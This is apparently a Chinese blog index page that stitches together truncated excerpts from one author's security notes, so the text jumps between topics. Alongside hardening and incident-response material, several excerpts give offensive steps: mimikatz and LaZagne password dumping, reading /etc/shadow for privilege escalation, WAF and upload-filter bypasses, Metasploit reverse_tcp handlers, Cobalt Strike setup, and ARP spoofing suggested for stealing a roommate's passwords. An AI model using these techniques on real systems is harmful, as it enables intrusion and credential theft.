简单介绍,博主本科虽然是学安全的,可惜忘了好多。课程也并没有实战内容先康康md5:MD5是一个非常常见的摘要(hash)逻辑. 其特点就是小巧. 速度快. 极难被破解远生态from hashlib import md5 obj = md5() obj.update("admin".encode("utf-8")) res = obj.hexdigest() print(res)有时候改一下,
suid, sudo,脏牛提权基本信息:基础信息收集 (1):内核,操作系统和设备信息uname -a 打印所有可用的系统信息 #去github找uname -r 内核版本(2)用户和群组cat /etc/passwd 列出系统上的所有用户cat /etc/shadow 列出系统上的所有用户密码(3)用户和权限信息:whoami 当前用户名id 当前用户信息脏
权限提升:systeminfo看补丁官网找漏洞:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017payloads下载:https://github.com/SecWiki/windows-kernel-exploits这里用巴西烤肉:pr.exe新建用户:UA
只能搞个阉割版,不放工具了。我这里分开成两个部分传mimikatz读密码:privilege::debug //提升权限sekurlsa::logonpassWords //抓取密码xp不支持而已,win7可以laZagne.exe读取密码:linux,windows都支持选项:效果:laZagne.exe all >>1.txt #导出结果高版本2016,2012则可以读取ha
web层面链接:https://pan.baidu.com/s/1HneA_Ifj0VThEbvi7oBVYA?pwd=pci4 提取码:pci4 白WebShell 6.0 VIP.asp给好权限:1313登录:notepad++,找到非法登录:显然代码被加密了修改msgbox,改为.vbs后缀hu="b_xk^jn^lm!z}z""6z}zxma^gxL^llbhg!zp^[+Z+]fbg
写在最前:所以博主搞一个阉割版,看看能不能发出去。分块传输法:插件叫这个:chunked-coding-converter.0.2.1.jar,应该搜的到,这次博主不提供了示范:然后自动拆分数据包,拆分了黑名单函数文件上传:方法一:等号绕过 在filename后多添加两个等号方法二:换行绕过在文件后缀名处换行方法三:填充垃圾字符在Content-Disposition字段后添加垃圾数据,来绕过对文
访问控制:配置apache运行账户:修改http.conf文件,添加如下:User apacheGroup apachegroup其中apache, apachegroup分别为Apache创建的用户和组。右键管理,可以新增一个组,账号写到那个组里。不要给管理员权限:检查方法:1.检查是否使用非专用账号比如root运行apache2.查看httpd.conf文件配置细节:1.设置外部不可访问<
链接:https://pan.baidu.com/s/1RH6hZOVMbkzAjApuGxfbHQ?pwd=sxpu 提取码:sxpu --来自百度网盘超级会员V5的分享 安全狗,建议安装在windows xp上,断网安装不用登录,这是一个bug 常见的系统攻击分为两类:一是利用Web服务器的漏洞进行攻击,如DDOS攻击、病毒木马破坏等攻击;二是利用网页自身的安全漏洞进行攻击,如SQL注入
这是博主找的docx,这里复制一份1 社会工程学最近几年,信息安全方面的问题日益严重,许多同学深受其害(比如网络钓鱼、盗用银行卡、蠕虫木马泛滥、僵尸网络盛行等等)。关键在于很大一部分原因在于相应的人们的重视力度没有跟上。且不说普通人对信息安全一无所知,即便是很多IT公司的专业 技术人员,对此也知之甚少。其后果就是:很多低端黑客的攻击手法屡试不爽,很多平庸的攻击者屡屡得手。有鉴于此,我打算普及一下信
配置口令复杂度:vi /etc/pam.d/system-auth添加:password requisite pam_cracklib.so difok=3 minien=8 ucredit=1lcredit=-1 dcredit=1#3种类型组合,最短8位设置口令认证失败锁定次数:添加:auth required pam_tally.so onerr=fail deny=10 unlock_ti
操作太多了,作者懒得截图, 这是博主的备忘录分配用户账号:display current-configuration 查看配置。查看输出中username部分是否按照用户分配账号配置口令复杂度:gpedit.msc设置口令认证失败锁定次数:控制面板->管理工具->本地安全策略账户策略->账户锁定策略 查看账户锁定阀值, 设置重置账户锁定计数器:配置口令生存期:禁用域环境密码修改
渗透测试流程:确定注意事项禁止脱裤,跑数据,传shell签合同,保密协议不能ddos攻击2.信息收集3.漏洞探测4.获取所需5.编写渗透测试报告二级域名或ip收集:dns传送漏洞:kali的dnsenum工具获取dns域中域名备案号查询ssl查询 https://myssl.com/ssl.htmlapp提取 androidkiller反编译微信公众号提前暴力破解 DEmonv1.2dns历
八、系统日志日志默认存放位置:/var/log/查看日志配置情况:more /etc/rsyslog.conf*日志文件**说明*/var/log/cron记录了系统定时任务相关的日志/var/log/cups记录打印信息的日志/var/log/dmesg记录了系统在开机时内核自检的信息,也可以使用dmesg命令直接查看内核自检信息/var/log/mailog记录邮件信息/var/log/mes
linux应急:Linux入侵排查:账号安全:/etc/passwd/etc/shadow用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留 who 查看当前登录用户(tty本地登陆 pts远程登录)uptime 查看登陆多久、多少用户,负载入侵排查:1、查询特权用户特权用户(uid 为0)[ro
qq盗号的木马:点击server.exe结束进程刷新以后又出来:用taskkill命令:taskkill /pid 892 taskkill /pid 984 taskkill /pid 2752写入bat文件,全部干掉打不开regedit,看到映像劫持:我们改过名字就行了,regedit.exe改成qwe.exe病毒弄映像劫持是为了干掉杀软或者使用autoruns.exe找到:全部删除:xueT
链接:https://pan.baidu.com/s/1b2GRZbgCCZN1RHdKFtKTsQ?pwd=p1y2 提取码:p1y2 应急响应:常见的应急响应事件分类:web入侵:网页挂马、主页篡改、Webshell系统入侵:病毒木马、勒索软件、远控后门网络攻击:DDOS攻击、DNS劫持、ARP欺骗入侵排查思路:一、检查系统账号安全1、查看服务器是否有弱口令,远程管理端口是否对公网开放。检查方
扫描器分为web和系统扫描:系统扫描:nessus,极光,天镜goby工具梳理资产:链接:https://pan.baidu.com/s/14HUgIKZUbnpFqHmkUkbxnA?pwd=waxv 提取码:waxv 资产:天镜:链接:https://pan.baidu.com/s/1FQGEht20fbAv699z3M14IA?pwd=k01q 提取码:k01q 装到虚拟机里,随后保存快照,
结合msf使用:效果并不好,不容易成功use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpshow optionsset lhost 192.168.1.105新建监听器:右键该会话:kali输入exploit并未成功,博主也改了端口。博主换一个:set lport 8888exploit行了会话极其不稳定,因为作
链接:https://pan.baidu.com/s/1GPnZ7Djnav8hxISvbxokBg?pwd=mdl9 提取码:mdl9 --来自百度网盘超级会员V5的分享安装:往kali里面上传:使用./teamserver +kali的 ip + 名称:我这里遇到了权限问题 chmod -R 777 cs/cs是我的文件夹名称客户端我放到win10虚拟机里:点击cs.bat这个东西虽然强大,但
纯人工审核耗时太大,一般采用工具+人工的形式本次要用的工具和资源:链接:https://pan.baidu.com/s/1aYniv90iu5GbSnvj8Pt_sA?pwd=g6x6 提取码:g6x6 --来自百度网盘超级会员V5的分享常见的工具:fortify, checkbugs博主用的是fortify, pojie教程在zip文件里面代码审计的通用思路1、通读全文代码,从功能函数代码开始阅
本节要用的环境和工具链接:https://pan.baidu.com/s/1uw-jMmSReDGSr0oc7LyzpA?pwd=x9kp 提取码:x9kp mkdir /usr/docker/ cd /usr/docker/ rz:上传离线包安装服务: yum install yum install docker-ce-17.12.1.ce-1.el7.centos.x86_64.rpm -y
kali,msf,linux
HTTP:HTTP(HyperText Transfer Protocol,超文本传输协议)是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。 HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基
系统:虚拟机xp,本次工具:链接:https://pan.baidu.com/s/1H4QrZyJASb9G9zhYHhdF7Q?pwd=zu1i 提取码:zu1i mac地址:也可以打开服务,手动更改:扫一下虚拟机:这里改网络适配器2,禁用上网:结果是停下了:按图输入,mac地址更改就能通了:同理可以禁止舍友的电脑窃取密码:Cain49先配置一下先改成桥接;全部选一遍:打开网站:再进行配置,包括
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号